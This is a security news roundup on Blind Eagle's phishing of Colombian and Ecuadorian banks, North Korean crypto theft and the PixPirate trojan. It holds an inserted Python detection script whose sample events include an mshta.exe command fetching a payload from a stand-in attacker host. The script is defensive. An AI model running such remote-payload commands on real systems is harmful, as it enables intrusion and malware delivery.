Colombia- and Ecuador-based organizations are being targeted by the Spanish-speaking threat group Blind Eagle, also known as APT-C-36, which has reemerged with a strengthened toolset and infection chain, The Hacker News reports.
Blind Eagle has targeted banks including Banco AV Villas, BBVA, Banco Caja Social, Banco de Bogota, Bancoomeva, Banco Popular, Colpatria, Davivienda, and TransUnion with phishing emails containing a malicious link that triggers Quasar RAT deployment, according to a Check Point report.
Meanwhile, a related campaign aimed at both countries impersonates Ecuador's Internal Revenue Services to deliver a multi-stage attack chain that abuses the mshta.exe binary to download the ByAV2.py script, which executes a Meterpreter payload, as well as the mp.py script, which is also a Meterpreter artifact.
"Blind Eagle is a strange bird among APT groups. Judging by its toolset and usual operations, it is clearly more interested in cybercrime and monetary gain than in espionage," said researchers.
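One defender-side check prompted by the mshta.exe stage described above, added here as an example and not drawn from the Check Point or Hacker News reporting: a small Python triage function over constructed Sysmon-style process-creation events (the paths, parent processes and URL are made up) that flags mshta.exe reaching out to a remote URL, mshta.exe launched by a mail client, and script hosts such as python.exe spawned by mshta.exe.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1
# (image, command line, parent image). Not real telemetry; the host name
# and file paths are placeholders for illustration only.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://attacker.example.invalid/stage/ByAV2.hta",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\Downloads\report.hta"',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Python39\python.exe",
     "cmdline": r"python.exe C:\Users\alice\AppData\Local\Temp\mp.py",
     "parent": r"C:\Windows\System32\mshta.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe notes.txt",
     "parent": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
MAIL_OFFICE_CLIENTS = ("outlook.exe", "winword.exe", "excel.exe")
SCRIPT_HOSTS = ("python.exe", "pythonw.exe", "powershell.exe",
                "cmd.exe", "wscript.exe", "cscript.exe")


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the reasons an event looks like mshta.exe abuse; [] means not flagged."""
    reasons = []
    image, parent = basename(event["image"]), basename(event["parent"])
    if image == "mshta.exe" and URL_RE.search(event["cmdline"]):
        reasons.append("mshta.exe launched with a remote URL")
    if image == "mshta.exe" and parent in MAIL_OFFICE_CLIENTS:
        reasons.append(f"mshta.exe spawned by mail/office client {parent}")
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        reasons.append(f"mshta.exe spawned script host {image}")
    return reasons


def detect(events: list) -> list:
    """(command line, reasons) for every event that matches at least one rule."""
    return [(e["cmdline"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for cmdline, reasons in detect(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(reasons))
```

A locally opened .hta file (the second event) is deliberately not flagged by these three rules, so it remains a review item rather than an alert.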
North Korean hackers stole $630 million in cryptocurrency assets in 2022, the highest on record, reports Reuters. According to a United Nations report, North Korean threat actors used sophisticated techniques to carry out the record-high theft of virtual assets, which are being allocated toward the country's nuclear weapons programs. The figure follows an earlier report by a cybersecurity firm that more than $1 billion in cryptocurrency was stolen by North Koreans last year. "The variation in USD value of cryptocurrency in recent months is likely to have affected these estimates, but both show that 2022 was a record-breaking year for DPRK (North Korea) virtual asset theft," said the U.N. report.
Several financial institutions in Brazil have been targeted by the novel Android banking trojan PixPirate that exploits the PIX payments platform for fraudulent activities, according to The Hacker News.